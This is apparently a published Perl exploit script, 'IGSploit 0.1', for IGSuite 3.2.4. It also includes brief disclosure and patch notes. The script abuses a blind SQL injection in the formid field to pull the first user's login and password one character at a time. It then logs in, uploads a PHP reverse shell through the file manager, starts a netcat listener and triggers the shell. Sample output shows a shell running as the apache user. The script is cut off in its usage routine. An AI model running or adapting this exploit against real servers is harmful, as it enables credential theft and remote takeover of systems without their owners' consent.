#!/usr/bin/perl # # 05/18/2008 - IGSuite 3.2.4 Blind SQL Injection - k`sOSe # # 05/21/2008 - Vendor notified # 05/23/2008 - A patch was pushed via the igsuited daemon(not enabled by default) # Fix: run igsuited --update-igsuite or upgrade to 3.2.5-beta. # # Tested on IGSuite 3.2.4 on linux with MySQL, needs nc(in path). # Drops a reverse shell, use http://pentestmonkey.net/tools/php-reverse-shell/ # # # cohelet ~ # ./igsploit.pl localhost /cgi-bin / ./php-reverse-shell.php 1234 # IGSploit 0.1 - k`sOSe # # [*] Abusing blind SQL injection: ksose=qwerty # [*] Logging in with username `ksose', password `qwerty'... # [I] Found `formid' -> 12141384631aX7I # [I] Logged in! # [*] Uploading shell.. # [I] Found `formid' -> 1214138463vOl5x # [*] Requesting //Home/ksose/php-reverse-shell.php now, shell will spawn here... # listening on [any] 1234 ... # connect to [] from localhost [] 44758 # Linux cohelet 2.6.25-gentoo-r5 #1 SMP PREEMPT Sat Jun 21 11:32:15 CEST 2008 i686 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz GenuineIntel GNU/Linux # 14:41:05 up 1 day, 2:52, 1 user, load average: 0.51, 0.34, 0.52 # USER TTY LOGIN@ IDLE JCPU PCPU WHAT # root tty1 Sat11 21:33m 0.84s 0.02s /bin/login -- # uid=81(apache) gid=81(apache) groups=81(apache) # sh: no job control in this shell # sh-3.2$ use warnings; use strict; print "IGSploit 0.1 - k`sOSe\n\n"; usage() unless(@ARGV>2); use POSIX; use LWP::UserAgent; use HTTP::Cookies; my $ighost = $ARGV[0]; my $igcgi = $ARGV[1]; my $igpath = $ARGV[2]; my $evilfile = $ARGV[3]; my $rport = $ARGV[4]; my $igurl = 'http://' . $ighost . $igcgi; my @chars = ( '', '=', 'a'..'z', 0..9, 'A'..'Z', '-', '_', '@', ';', ':', ',', '.', ')' ,'(', '&', '/', '%', '$' ); my $count = 1; my $string = ''; my $ua = LWP::UserAgent->new; $ua->agent( "Mozilla/5.0" ); $ua->cookie_jar( HTTP::Cookies->new( ) ); $ua->timeout(5); print "[*] Abusing blind SQL injection: "; $|=1; while(1) { for my $char( @chars ) { if( defined( my $found = check_char( $count, $char ) ) ) { if( $found eq '' ) { upload_shell( split( '=', $string ) ); exit; } $string .= $found; $count++; last; } } } sub upload_shell { my ($username, $password) = @_; print "[*] Logging in with username `$username', password `$password'...\n"; do_login( $username, $password ); print "[*] Uploading shell..\n"; my $formid = get_formid( $ua->get( "$igurl/filemanager?action=uploadfile&dir=/Home/$username&repid=&repapp=&order=nome" )->content ); my $res = $ua->post( "$igurl/filemanager", Content_Type => 'multipart/form-data', Content => [ formid => [undef, undef, Content => $formid], upfile => [undef, ($evilfile =~ m/.+\/(.+)/g)[0], Content => slurp($evilfile)], newfilename => [undef, undef, Content => $evilfile], submit8 => [undef, undef, Content => 'Conferma'], ] ); if(qx(which nc 2>&1) !~ /^which:/) { print "[*] Requesting $igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . " now, shell will spawn here...\n"; my $pid = fork(); if($pid) { sleep 2; my $res = $ua->get ( "http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] ); if(!$res->is_success && $res->status_line() !~ /^500 .*timeout/) { print "\n[W] Unexpected status code received -> " . $res->status_line . "\n"; } waitpid($pid, 0); } else { exec("`which nc` -v -l -p $rport"); } } else { print "[W] Can't find netcat!\n"; print "[*] File uploaded on http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . ", start your listener on port $rport and wget it\n"; } } sub do_login { my ($username, $password) = @_; my $formid = get_formid($ua->get( "$igurl/igsuite" )->content); my $res = $ua->post( "$igurl/igsuite", { formid => $formid, login => $username, pwd => $password, submit5 => 'Accedi', }); die( "Can't login\n" ) if( $res->content !~ /this application need a browser that support multi frame/ ); # lies print "[I] Logged in!\n"; return $formid; } sub get_formid { my ($content) = @_; die( "Can't find formid value\n" ) unless $content =~ /name="formid"\s+value="(.+?)"/; print "[I] Found `formid' -> $1\n"; return $1; } sub slurp { return do { open(my $f, "<$_[0]") or die("opening `$_[0]': $!"); local $/; my $s=<$f>; close $f; $s }; } sub check_char { my ($count, $char) = @_; my $res = $ua->post( "$igurl/igsuite", { formid => "1' OR (SELECT ". "MID(CONCAT(`login`, 0x3d, `passwd`), $count, 1) ". "FROM `users` LIMIT 0,1) = '$char", }); die ("Error: " . $res->status_line . "\n") unless ( $res->is_success ); if($res->content =~ /IGSuite Error/) { print "\b$char"; return undef; } elsif($res->status_line =~ /^(2\d+|3\d+)/) { print "\b$char "; print "\n" if ($char eq ''); return $char; } else { print "\n[!] " . $res->status_line . ":\n########\n\n" . $res->content . "\n########\n\n"; die("[!] Failed, check cgi/docroot path."); } } sub usage { die <